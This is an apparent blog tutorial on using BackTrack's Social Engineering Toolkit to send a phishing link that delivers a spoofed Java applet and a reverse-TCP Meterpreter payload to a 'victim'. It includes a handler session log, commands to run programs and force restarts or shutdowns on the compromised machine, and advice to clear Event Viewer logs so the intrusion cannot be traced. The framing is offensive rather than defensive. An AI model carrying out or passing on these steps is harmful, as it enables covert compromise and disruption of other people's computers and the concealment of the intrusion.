Hacking via BackTrack using SET Attack Method



Hacking via BackTrack using SET Attack Method

Hacking via BackTrack using SET Attack 

1. Click on Applications, BackTrack, Exploit Tools, Social Engineering Tools, Social Engineering Toolkit then select set.





Then it will open a new window like show below -

 Then Select first option Social Engineering Attacks using no. 1, then it will create another window -


Then Select option 2 Website Attack Vectors which is the unique way of using multiple web based attacks Inorder to compromise the Intended victim.

After that Select  option 1 which is Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload which uses a customized java applet created by Thomas Werth to deliver the payload. This will pop a new window like shown below -



Then after that Select the first option which is for Web Template that will allow SET to import a list of pre-defined web applications that it can utilize within the attack. After pressing enter on selecting Web Template it will show like to use Port/NAT Forwarding, I am pressing simply 'no' then enter as I am doing this on my Virtual Machine.
Then provide the IP of your BackTrack machine so that it can make reverse connection with your machine when the victim uses the link provided by you.



Then Select the Java Required option which is first in number and then on a new windows select the required payload that you want to generate, As of now I am using the Second option which is Windows Reverse_TCP Meterpreter and it will create a shell access between the attacker and the victim.



Then it will show you a list of Encoding's which will help you to bypass the security in the Victim's machine. I am going with no.16 Backdoored Executable which is the best in finding a spamhole in the concerned machine.



After Selecting the 16th option then it will ask for the Port No. just press enter then it will use the default Port No. Then it will Launch the Web SET Attack and will start the number of Vulnerabilities and then finally it will generate a link which you can pass to the Victim and once he uses that link then his machine will create a TCP Connection on the random port number. Refer the Snapshots given for more details -



This will then generate a powershell execution code which will be running in the background and then it will start to load MSF and finally it generates a link which anybody if tries to open will create reverse connection to the Attacker -



Then it will provide us a links like this http://192.168.245.128:8081/ and when the victim tries to open this then all the Information of his system will be back to us (Attacker) via Reverse TCP Connection.



Once the client tries to use that link then it will generate the connection in some random port between the Attacker and the Victim that will be TCP Based and it will look something like this -

++++++
msf  exploit(handler) >
[*] Started reverse handler on 192.168.245.128:8081
[*] Starting the payload handler...

msf  exploit(handler) > ses
[*] Sending stage (36 bytes) to 192.168.245.1
[*] Command shell session 1 opened (192.168.245.128:8081 -> 192.168.245.1:53992) at 2013-05-22 20:16:25 +0530
[*] Command shell session 1 closed.  Reason: Died from EOFError
[*] Session ID 1 (192.168.245.128:8081 -> 192.168.245.1:53992) processing InitialAutoRunScript 'post/osx/gather/enum_osx'
++++++

Session ID 1 (192.168.245.128:8081 -> 192.168.245.1:53992)
This shows that the session is Established with the Victim's machine when he has accessed the link given by us with session ID 1 -

We can track the connection via the 'sessions' command in our Console (BackTrack) 



Here we can see that we have created a Session with the Victim's Machine whose IP is 192.168.245.1
which is my local machine. Now going to my Local Machine to check whether the connection has been established or not use 'netstat' command with the following arguments -
> netstat -ano | find "53993" 
Where above port which is generated randomly for Victim's Machine by the SET Server Launched.

Hence, Now when we are connected to the Victim's Machine we can try and execute many programs and can edit any files on his machine. 

To be a bit Smart after getting connected to the concerned machine just execute "EventViewer" and then remove all the Notifications so that none can track what is going on with his machine.

Now to start getting into his machine we will use this command "sessions -i 2" where 2 is the Session ID as shown by the Active Sessions.



Now after running the above command it will start sending HTTP Packets to the concerned machine via GET Method. Then after that you can use any commands like "execute notepad.exe" under your console which will open a notepad under the victim's machine.


Then to verify the connection perfectly established or not we will run the following commands given in the snapshot below in Victim's Machine -



Thus this is how we can connect to the concerned machine and utilizes the resource in his System.

Now you can play with his System whenever you want till the session is Establish.
You can even Restart, Shutdown his System using the below command from your Console -

1. Restart => execute shutdown -r -f -t 00 -c "Restarting"
This will Forcefully Restart his System using the comment restarting.

2. Shutdown => execute shutdown -s -f -t 00 -c "Shutdown"
This will forcefully shutdown his machine within 00 seconds and comment like shutdown.

Enjoyyy This Post. Be Calm and Stay Awake there is more to come from the BackTrack 5 R3 and Kali Linux World.





FEED






Share










SUPPORT
















VISIT COUNTER !!








ROHIT PATEL